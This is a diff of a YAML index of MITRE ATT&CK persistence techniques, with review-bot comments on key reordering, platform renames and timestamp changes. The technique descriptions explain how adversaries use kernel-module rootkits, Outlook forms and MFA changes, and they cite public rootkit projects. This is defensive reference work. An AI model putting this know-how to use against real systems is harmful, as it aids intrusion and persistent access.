- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
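Review bot: the three `-` lines here (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `spec_version`) remove keys from the bottom of T1136.003 that the earlier hunks re-insert higher up, so the net change for that technique is one contributor, two platform names and a version bump. Consider having the generator emit keys in a stable order so the next regeneration does not produce the same churn and reviewers can see the real content diff.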
@@ -32408,16 +32834,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32458,143 +32883,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
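Review bot: nearly all of this hunk is key reordering for T1547.006 (`description`, `x_mitre_detection`, platforms, data sources and `x_mitre_permissions_required` moved above `external_references`, and `url:` moved below `description:` in every reference); the substantive changes are `modified` 2022-05-11 to 2024-09-12, the iDefense reference moving to https with a 2024 retrieval date, and `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 while `x_mitre_version` stays at `'1.3'`. Separately, in both the removed and the added text the command names inside the block scalars sit on their own lines with the sentence split around them (`kextload` / `and kextunload` / `commands.`, `modprobe` / `, insmod` / `, lsmod` ...), which looks like inline-code markup lost on the way into YAML; it is carried over unchanged here, so the fix belongs in whatever renders the description, not in this file.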
@@ -32631,7 +33054,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
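Review bot: `modified` for T1574.013 moves backwards, from 2022-05-11 to 2022-03-22, and the same regression appears for T1542.004 (2021-04-29 to 2020-10-22) and T1505.004 (2022-04-25 to 2021-10-17) further down. That is what you would expect when switching from a bundle that bulk re-timestamped objects to one that did not, but any consumer using `modified` as a freshness check will now treat these techniques as older than the previous index, so the change of source bundle should be stated in the commit message.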
@@ -32657,12 +33080,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
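Review bot: after the two `-` lines at the top of this hunk T1574.013 carries no `x_mitre_attack_spec_version` at all, whereas techniques that previously had a 3.x value keep or gain `x_mitre_attack_spec_version: 3.2.0`; T1542.004 and T1505.004 end up in the same state later in the diff. If the upstream objects genuinely lack the field that is acceptable, but an index where some techniques carry the attack spec version and others do not is awkward to validate, so either keep the field for these three or drop it uniformly and document that.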
@@ -32740,9 +33161,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -32769,7 +33189,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32791,41 +33211,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -32834,22 +33223,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
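Review bot: besides the `Office 365` to `Office Suite` rename and the `'1.1'` to `'1.2'` version bump, this hunk silently drops `x_mitre_permissions_required` (`Administrator`, `User`) from T1137.003 with no replacement, while T1547.006, T1542.004 and T1505.004 in the same diff keep theirs. If the upstream object no longer carries the field that is fine, but the remaining entries elsewhere are then inconsistent and anything that filters atomics by required permissions will treat T1137.003 differently from its neighbours; worth a line in the commit message either way.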
@@ -32915,7 +33331,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -32989,11 +33404,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33010,7 +33424,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33020,7 +33433,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33029,19 +33442,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
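Review bot: the `- x_mitre_modified_by_ref` removal at the top of this hunk leaves T1078 without that key until the next hunk re-adds it at the bottom next to `x_mitre_attack_spec_version: 3.2.0`, so the diff is net-neutral on those two keys and the real change is `Azure AD` / `Office 365` / `Google Workspace` to `Office Suite` / `Identity Provider` plus `'2.6'` to `'2.7'`. Since T1078 is the technique whose cloud-account atomics are split across per-platform indexes, double-check that indexes keyed on the old platform names still pick up its tests after this rename.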
@@ -33089,11 +33500,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33122,24 +33534,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
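Review bot: `x_mitre_detection: ''` for T1556.006 is unchanged context here, but with `x_mitre_version` going to `'1.3'`, a new contributor and the platform rename to `Office Suite` / `Identity Provider`, this is the natural point to confirm the upstream object still has an empty detection block rather than the generator dropping it; if it is empty upstream there is nothing to change in this hunk.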
@@ -33174,9 +33588,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
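Review bot: the removals of `x_mitre_attack_spec_version: 3.2.0`, `x_mitre_modified_by_ref` and `spec_version: '2.1'` at the end of T1556.006 pair with the re-addition of the first two near the top of the same object in the preceding hunk, so this is a key reorder rather than a content change. The generator should serialise keys in a stable order (sorted, or matching the previous file) so that a regenerated index shows only real changes; as it stands, most of this diff is movement that hides the handful of substantive edits.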
